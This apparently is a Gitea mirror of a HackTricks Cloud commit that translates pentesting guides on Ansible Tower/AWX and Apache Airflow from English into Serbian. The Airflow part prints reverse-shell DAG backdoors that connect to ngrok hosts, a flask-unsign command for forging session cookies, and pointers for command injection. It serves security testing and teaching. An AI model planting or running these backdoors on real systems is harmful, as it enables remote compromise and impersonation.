gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-02-04 19:11:41 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/

Browse Source
This commit is contained in:
Translator
2024-12-31 20:24:43 +00:00
parent 10e2881a9b
commit 9ce07d92a3
245 changed files with 9883 additions and 12659 deletions
Download Patch File Download Diff File Expand all files Collapse all files

26
src/README.md
View File

@@ -6,35 +6,31 @@ Reading time: {{ #reading_time }}
<figure><img src="images/cloud.gif" alt=""><figcaption></figcaption></figure>
_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
_Hacktricks logotipi & animacije dizajnirao_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
> [!TIP]
> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news.
> Dobrodošli na stranicu gde ćete pronaći svaki **hacking trik/tehniku/šta god vezano za CI/CD & Cloud** koju sam naučio u **CTF-ovima**, **pravim** životnim **okruženjima**, **istražujući**, i **čitajuci** istraživanja i vesti.
### **Pentesting CI/CD Methodology**
### **Pentesting CI/CD Metodologija**
**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:**
**U HackTricks CI/CD Metodologiji ćete pronaći kako da pentestujete infrastrukturu vezanu za CI/CD aktivnosti.** Pročitajte sledeću stranicu za **uvod:**
[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
### Pentesting Cloud Methodology
### Pentesting Cloud Metodologija
**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:**
**U HackTricks Cloud Metodologiji ćete pronaći kako da pentestujete cloud okruženja.** Pročitajte sledeću stranicu za **uvod:**
[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md)
### License & Disclaimer
### Licenca & Odricanje
**Check them in:**
**Proverite ih u:**
[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
[HackTricks Vrednosti & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
### Github Stats
### Github Statistika
![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg)
![HackTricks Cloud Github Statistika](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg)
{{#include ./banners/hacktricks-training.md}}

2
src/SUMMARY.md
View File

@@ -505,3 +505,5 @@

16
src/banners/hacktricks-training.md
View File

@@ -1,17 +1,13 @@
> [!TIP]
> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Učite i vežbajte AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Učite i vežbajte GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
> <summary>Podržite HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
> - Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
> - **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
>
> </details>

130
src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
View File

@@ -4,60 +4,59 @@
## Basic Information
**Ansible Tower** or it's opensource version [**AWX**](https://github.com/ansible/awx) is also known as **Ansibles user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Towers REST API and command-line interface make it simple to integrate it into current tools and workflows.
**Ansible Tower** ili njegova open-source verzija [**AWX**](https://github.com/ansible/awx) poznata je kao **korisnički interfejs, kontrolna tabla i REST API Ansible-a**. Sa **kontrolom pristupa zasnovanom na rolama**, rasporedom poslova i grafičkim upravljanjem inventarom, možete upravljati svojom Ansible infrastrukturom iz modernog UI-a. REST API i komandna linija Tower-a olakšavaju integraciju sa trenutnim alatima i radnim tokovima.
**Automation Controller is a newer** version of Ansible Tower with more capabilities.
**Automation Controller je novija** verzija Ansible Tower-a sa više mogućnosti.
### Differences
According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX is the received support and the Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows.
Prema [**ovome**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), glavne razlike između Ansible Tower-a i AWX-a su podrška koja se dobija, a Ansible Tower ima dodatne funkcije kao što su kontrola pristupa zasnovana na rolama, podrška za prilagođene API-je i korisnički definisani radni tokovi.
### Tech Stack
- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs.
- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface.
- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data.
- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners.
- **Redis**: Redis serves as a cache and a backend for the task queue.
- **Web Interface**: Ovo je grafički interfejs gde korisnici mogu upravljati inventarima, akreditivima, šablonima i poslovima. Dizajniran je da bude intuitivan i pruža vizualizacije koje pomažu u razumevanju stanja i rezultata vaših automatizovanih poslova.
- **REST API**: Sve što možete uraditi u web interfejsu, možete uraditi i putem REST API-ja. To znači da možete integrisati AWX/Tower sa drugim sistemima ili skriptovati radnje koje biste obično izvodili u interfejsu.
- **Database**: AWX/Tower koristi bazu podataka (obično PostgreSQL) za čuvanje svoje konfiguracije, rezultata poslova i drugih neophodnih operativnih podataka.
- **RabbitMQ**: Ovo je sistem za razmenu poruka koji koristi AWX/Tower za komunikaciju između različitih komponenti, posebno između web servisa i izvršitelja zadataka.
- **Redis**: Redis služi kao keš i pozadinski sistem za red zadataka.
### Logical Components
- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc.
- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed..
- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job.
- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run.
- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials.
- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events.
- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc.
- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed.
- **Inventories**: Inventar je **kolekcija hostova (ili čvorova)** protiv kojih se mogu **izvršavati poslovi** (Ansible playbook-ovi). AWX/Tower vam omogućava da definišete i grupišete svoje inventare i takođe podržava dinamične inventare koji mogu **pribaviti liste hostova iz drugih sistema** kao što su AWS, Azure, itd.
- **Projects**: Projekat je u suštini **kolekcija Ansible playbook-ova** preuzetih iz **sistema za kontrolu verzija** (kao što je Git) kako bi se povukli najnoviji playbook-ovi kada je to potrebno.
- **Templates**: Šabloni poslova definišu **kako će se određeni playbook izvršiti**, specificirajući **inventar**, **akreditive** i druge **parametre** za posao.
- **Credentials**: AWX/Tower pruža siguran način za **upravljanje i čuvanje tajni, kao što su SSH ključevi, lozinke i API tokeni**. Ovi akreditivi mogu biti povezani sa šablonima poslova kako bi playbook-ovi imali neophodan pristup kada se izvršavaju.
- **Task Engine**: Ovo je mesto gde se dešava magija. Task engine je izgrađen na Ansible-u i odgovoran je za **izvršavanje playbook-ova**. Poslovi se šalju task engine-u, koji zatim izvršava Ansible playbook-ove protiv određenog inventara koristeći specificirane akreditive.
- **Schedulers and Callbacks**: Ovo su napredne funkcije u AWX/Tower koje omogućavaju **raspoređivanje poslova** da se izvršavaju u određenim vremenima ili da budu pokrenuti spoljnim događajima.
- **Notifications**: AWX/Tower može slati obaveštenja na osnovu uspeha ili neuspeha poslova. Podržava različite načine obaveštavanja kao što su e-mailovi, Slack poruke, webhook-ovi, itd.
- **Ansible Playbooks**: Ansible playbook-ovi su alati za konfiguraciju, implementaciju i orkestraciju. Oni opisuju željeno stanje sistema na automatizovan, ponovljiv način. Napisani u YAML-u, playbook-ovi koriste Ansible-ov deklarativni jezik automatizacije za opisivanje konfiguracija, zadataka i koraka koji treba da se izvrše.
### Job Execution Flow
1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower.
1. **User Interaction**: Korisnik može interagovati sa AWX/Tower ili putem **Web Interface** ili **REST API**. Ovi pružaju front-end pristup svim funkcionalnostima koje nudi AWX/Tower.
2. **Job Initiation**:
- The user, via the Web Interface or API, initiates a job based on a **Job Template**.
- The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**.
- Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution.
- Korisnik, putem Web Interface-a ili API-ja, pokreće posao na osnovu **Job Template**.
- Job Template uključuje reference na **Inventory**, **Project** (koji sadrži playbook) i **Credentials**.
- Po pokretanju posla, zahtev se šalje AWX/Tower pozadini da se posao stavi u red za izvršenje.
3. **Job Queuing**:
- **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ.
- **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution.
- **RabbitMQ** upravlja razmenom poruka između web komponente i izvršitelja zadataka. Kada se posao pokrene, poruka se šalje task engine-u koristeći RabbitMQ.
- **Redis** deluje kao pozadinski sistem za red zadataka, upravljajući redom poslova koji čekaju na izvršenje.
4. **Job Execution**:
- The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials.
- Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**.
- As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**.
- **Task Engine** preuzima posao iz reda. Preuzima potrebne informacije iz **Database** o povezanom playbook-u, inventaru i akreditivima.
- Koristeći preuzeti Ansible playbook iz povezanog **Project**, Task Engine izvršava playbook protiv specificiranih **Inventory** čvorova koristeći date **Credentials**.
- Dok se playbook izvršava, njegov izlaz (logovi, činjenice, itd.) se beleži i čuva u **Database**.
5. **Job Results**:
- Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**.
- Users can then view the results through the Web Interface or query them via the REST API.
- Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc.
- Kada se playbook završi, rezultati (uspeh, neuspeh, logovi) se čuvaju u **Database**.
- Korisnici mogu pregledati rezultate putem Web Interface-a ili ih pretraživati putem REST API-ja.
- Na osnovu ishoda posla, **Notifications** se mogu slati kako bi obavestili korisnike ili spoljne sisteme o statusu posla. Obaveštenja mogu biti e-mailovi, Slack poruke, webhook-ovi, itd.
6. **External Systems Integration**:
- **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more.
- **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution.
- **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times.
- **Inventories** se mogu dinamički preuzimati iz spoljnog sistema, omogućavajući AWX/Tower da povuče hostove iz izvora kao što su AWS, Azure, VMware i drugi.
- **Projects** (playbook-ovi) mogu se preuzeti iz sistema za kontrolu verzija, osiguravajući korišćenje ažuriranih playbook-ova tokom izvršenja posla.
- **Schedulers and Callbacks** mogu se koristiti za integraciju sa drugim sistemima ili alatima, omogućavajući AWX/Tower da reaguje na spoljne okidače ili izvršava poslove u unapred određenim vremenima.
### AWX lab creation for testing
[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX:
[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) moguće je koristiti docker-compose za pokretanje AWX:
```bash
git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version
@@ -83,61 +82,56 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser
# Load demo data
docker exec tools_awx_1 awx-manage create_preload_data
```
## RBAC
### Supported roles
The most privileged role is called **System Administrator**. Anyone with this role can **modify anything**.
Najprivilegovanija uloga se zove **System Administrator**. Svako ko ima ovu ulogu može **modifikovati bilo šta**.
From a **white box security** review, you would need the **System Auditor role**, which allow to **view all system data** but cannot make any changes. Another option would be to get the **Organization Auditor role**, but it would be better to get the other one.
Iz **white box security** pregleda, potrebna vam je **System Auditor role**, koja omogućava **pregled svih podataka sistema** ali ne može da pravi nikakve promene. Druga opcija bi bila da dobijete **Organization Auditor role**, ali bi bilo bolje da dobijete onu prvu.
<details>
<summary>Expand this to get detailed description of available roles</summary>
1. **System Administrator**:
- This is the superuser role with permissions to access and modify any resource in the system.
- They can manage all organizations, teams, projects, inventories, job templates, etc.
- Ovo je superuser uloga sa dozvolama za pristup i modifikaciju bilo kog resursa u sistemu.
- Mogu upravljati svim organizacijama, timovima, projektima, inventarima, šablonima poslova, itd.
2. **System Auditor**:
- Users with this role can view all system data but cannot make any changes.
- This role is designed for compliance and oversight.
- Korisnici sa ovom ulogom mogu da vide sve podatke sistema, ali ne mogu da prave nikakve promene.
- Ova uloga je dizajnirana za usklađenost i nadzor.
3. **Organization Roles**:
- **Admin**: Full control over the organization's resources.
- **Auditor**: View-only access to the organization's resources.
- **Member**: Basic membership in an organization without any specific permissions.
- **Execute**: Can run job templates within the organization.
- **Read**: Can view the organizations resources.
- **Admin**: Potpuna kontrola nad resursima organizacije.
- **Auditor**: Pristup samo za pregled resursa organizacije.
- **Member**: Osnovno članstvo u organizaciji bez specifičnih dozvola.
- **Execute**: Može pokretati šablone poslova unutar organizacije.
- **Read**: Može pregledati resurse organizacije.
4. **Project Roles**:
- **Admin**: Can manage and modify the project.
- **Use**: Can use the project in a job template.
- **Update**: Can update project using SCM (source control).
- **Admin**: Može upravljati i modifikovati projekat.
- **Use**: Može koristiti projekat u šablonu posla.
- **Update**: Može ažurirati projekat koristeći SCM (source control).
5. **Inventory Roles**:
- **Admin**: Can manage and modify the inventory.
- **Ad Hoc**: Can run ad hoc commands on the inventory.
- **Update**: Can update the inventory source.
- **Use**: Can use the inventory in a job template.
- **Read**: View-only access.
- **Admin**: Može upravljati i modifikovati inventar.
- **Ad Hoc**: Može pokretati ad hoc komande na inventaru.
- **Update**: Može ažurirati izvor inventara.
- **Use**: Može koristiti inventar u šablonu posla.
- **Read**: Pristup samo za pregled.
6. **Job Template Roles**:
- **Admin**: Can manage and modify the job template.
- **Execute**: Can run the job.
- **Read**: View-only access.
- **Admin**: Može upravljati i modifikovati šablon posla.
- **Execute**: Može pokrenuti posao.
- **Read**: Pristup samo za pregled.
7. **Credential Roles**:
- **Admin**: Can manage and modify the credentials.
- **Use**: Can use the credentials in job templates or other relevant resources.
- **Read**: View-only access.
- **Admin**: Može upravljati i modifikovati akreditive.
- **Use**: Može koristiti akreditive u šablonima poslova ili drugim relevantnim resursima.
- **Read**: Pristup samo za pregled.
8. **Team Roles**:
- **Member**: Part of the team but without any specific permissions.
- **Admin**: Can manage the team's members and associated resources.
- **Member**: Deo tima, ali bez specifičnih dozvola.
- **Admin**: Može upravljati članovima tima i povezanim resursima.
9. **Workflow Roles**:
- **Admin**: Can manage and modify the workflow.
- **Execute**: Can run the workflow.
- **Read**: View-only access.
- **Admin**: Može upravljati i modifikovati tok rada.
- **Execute**: Može pokrenuti tok rada.
- **Read**: Pristup samo za pregled.
</details>
{{#include ../banners/hacktricks-training.md}}

144
src/pentesting-ci-cd/apache-airflow-security/README.md
View File

@@ -2,22 +2,21 @@
{{#include ../../banners/hacktricks-training.md}}
### Basic Information
### Osnovne Informacije
[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
[**Apache Airflow**](https://airflow.apache.org) služi kao platforma za **orchestraciju i zakazivanje podataka ili radnih tokova**. Termin "orchestration" u kontekstu podataka označava proces organizovanja, koordinacije i upravljanja složenim radnim tokovima podataka koji potiču iz različitih izvora. Primarna svrha ovih orkestriranih radnih tokova podataka je da obezbede obrađene i upotrebljive skupove podataka. Ovi skupovi podataka se široko koriste u mnogim aplikacijama, uključujući, ali ne ograničavajući se na alate za poslovnu inteligenciju, modele podataka i mašinskog učenja, koji su svi osnovni za funkcionisanje aplikacija velikih podataka.
Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.
U suštini, Apache Airflow će vam omogućiti da **zakazujete izvršenje koda kada se nešto** (događaj, cron) **dogodi**.
### Local Lab
### Lokalni Laboratorija
#### Docker-Compose
You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
Možete koristiti **docker-compose konfiguracioni fajl sa** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) da pokrenete kompletnu apache airflow docker sredinu. (Ako ste na MacOS-u, obavezno dodelite najmanje 6GB RAM-a docker VM-u).
#### Minikube
One easy way to **run apache airflo**w is to run it **with minikube**:
Jedan jednostavan način da **pokrenete apache airflow** je da ga pokrenete **sa minikube**:
```bash
helm repo add airflow-stable https://airflow-helm.github.io/charts
helm repo update
@@ -27,10 +26,9 @@ helm install airflow-release airflow-stable/airflow
# Use this command to delete it
helm delete airflow-release
```
### Airflow Configuration
Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
Airflow može čuvati **osetljive informacije** u svojoj konfiguraciji ili možete pronaći slabe konfiguracije:
{{#ref}}
airflow-configuration.md
@@ -38,7 +36,7 @@ airflow-configuration.md
### Airflow RBAC
Before start attacking Airflow you should understand **how permissions work**:
Pre nego što počnete sa napadom na Airflow, trebali biste razumeti **kako funkcionišu dozvole**:
{{#ref}}
airflow-rbac.md
@@ -48,55 +46,52 @@ airflow-rbac.md
#### Web Console Enumeration
If you have **access to the web console** you might be able to access some or all of the following information:
Ako imate **pristup web konzoli**, možda ćete moći da pristupite nekim ili svim sledećim informacijama:
- **Variables** (Custom sensitive information might be stored here)
- **Connections** (Custom sensitive information might be stored here)
- Access them in `http://<airflow>/connection/list/`
- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
- List **users & roles**
- **Code of each DAG** (which might contain interesting info)
- **Varijable** (Prilagođene osetljive informacije mogu biti sačuvane ovde)
- **Konekcije** (Prilagođene osetljive informacije mogu biti sačuvane ovde)
- Pristupite im na `http://<airflow>/connection/list/`
- [**Konfiguracija**](./#airflow-configuration) (Osetljive informacije kao što su **`secret_key`** i lozinke mogu biti sačuvane ovde)
- Lista **korisnika i uloga**
- **Kod svakog DAG-a** (koji može sadržati zanimljive informacije)
#### Retrieve Variables Values
Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http://<airflow>/variable/list/`.\
Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**.
Varijable se mogu čuvati u Airflow-u tako da **DAG-ovi** mogu **pristupiti** njihovim vrednostima. Slično je tajnama drugih platformi. Ako imate **dovoljno dozvola**, možete im pristupiti u GUI-u na `http://<airflow>/variable/list/`.\
Airflow po defaultu prikazuje vrednost varijable u GUI-u, međutim, prema [**ovome**](https://marclamberti.com/blog/variables-with-apache-airflow/), moguće je postaviti **listu varijabli** čija će **vrednost** biti prikazana kao **zvezdice** u **GUI**.
![](<../../images/image (164).png>)
However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\
To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it:
Međutim, ove **vrednosti** se i dalje mogu **pribaviti** putem **CLI** (morate imati pristup bazi podataka), **izvršavanjem proizvoljnog DAG-a**, **API** pristupom krajnjoj tački varijabli (API mora biti aktiviran), i **čak i samim GUI-em!**\
Da biste pristupili tim vrednostima iz GUI-a, jednostavno **izaberite varijable** kojima želite da pristupite i **kliknite na Akcije -> Izvezi**.\
Drugi način je da izvršite **bruteforce** na **skrivenoj vrednosti** koristeći **filtriranje pretrage** dok je ne dobijete:
![](<../../images/image (152).png>)
#### Privilege Escalation
If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
Ako je konfiguracija **`expose_config`** postavljena na **True**, iz **uloge Korisnik** i **naviše** mogu **čitati** **konfiguraciju na web-u**. U ovoj konfiguraciji se pojavljuje **`secret_key`**, što znači da svaki korisnik sa ovim važećim može **napraviti svoj potpisani kolačić da bi se pretvarao da je bilo koji drugi korisnički nalog**.
```bash
flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
```
#### DAG Backdoor (RCE u Airflow radniku)
#### DAG Backdoor (RCE in Airflow worker)
If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
Note that this reverse shell is going to be executed inside an **airflow worker container**:
Ako imate **pristup za pisanje** na mestu gde se **DAG-ovi čuvaju**, možete jednostavno **napraviti jedan** koji će vam poslati **obrnuti shell.**\
Imajte na umu da će ovaj obrnuti shell biti izvršen unutar **airflow radničkog kontejnera:**
```python
import pendulum
from airflow import DAG
from airflow.operators.bash import BashOperator
with DAG(
dag_id='rev_shell_bash',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
dag_id='rev_shell_bash',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = BashOperator(
task_id='run',
bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
)
run = BashOperator(
task_id='run',
bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
)
```
```python
@@ -105,75 +100,66 @@ from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
with DAG(
dag_id='rev_shell_python',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
dag_id='rev_shell_python',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python',
python_callable=rs,
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
)
run = PythonOperator(
task_id='rs_python',
python_callable=rs,
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
)
```
#### DAG Backdoor (RCE u Airflow scheduler-u)
#### DAG Backdoor (RCE in Airflow scheduler)
If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
Ako postavite nešto da bude **izvršeno u korenu koda**, u trenutku pisanja ovog teksta, biće **izvršeno od strane scheduler-a** nakon nekoliko sekundi nakon što ga stavite unutar DAG-ove fascikle.
```python
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
rs("2.tcp.ngrok.io", 14403)
with DAG(
dag_id='rev_shell_python2',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
dag_id='rev_shell_python2',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python2',
python_callable=rs,
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
run = PythonOperator(
task_id='rs_python2',
python_callable=rs,
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
```
#### Kreiranje DAG-a
#### DAG Creation
Ako uspete da **kompromitujete mašinu unutar DAG klastera**, možete kreirati nove **DAG skripte** u `dags/` folderu i one će biti **replicirane na ostalim mašinama** unutar DAG klastera.
If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.
#### Injekcija koda u DAG
#### DAG Code Injection
Kada izvršavate DAG iz GUI-a, možete **proslediti argumente**.\
Stoga, ako DAG nije pravilno kodiran, mogao bi biti **ranjiv na Injekciju Komandi.**\
To se desilo u ovom CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
When you execute a DAG from the GUI you can **pass arguments** to it.\
Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\
That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**.
Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**:
Sve što treba da znate da **počnete da tražite injekcije komandi u DAG-ovima** je da se **parametri** **pristupaju** kodom **`dag_run.conf.get("param_name")`**.
Štaviše, ista ranjivost može se javiti sa **varijablama** (imajte na umu da sa dovoljno privilegija možete **kontrolisati vrednost varijabli** u GUI-u). Varijable se **pristupaju sa**:
```python
from airflow.models import Variable
[...]
foo = Variable.get("foo")
```
If they are used for example inside a a bash command, you could perform a command injection.
Ако се користе, на пример, унутар bash команде, могли бисте извршити инјекцију команде.
{{#include ../../banners/hacktricks-training.md}}

112
src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
View File

@@ -4,112 +4,102 @@
## Configuration File
**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
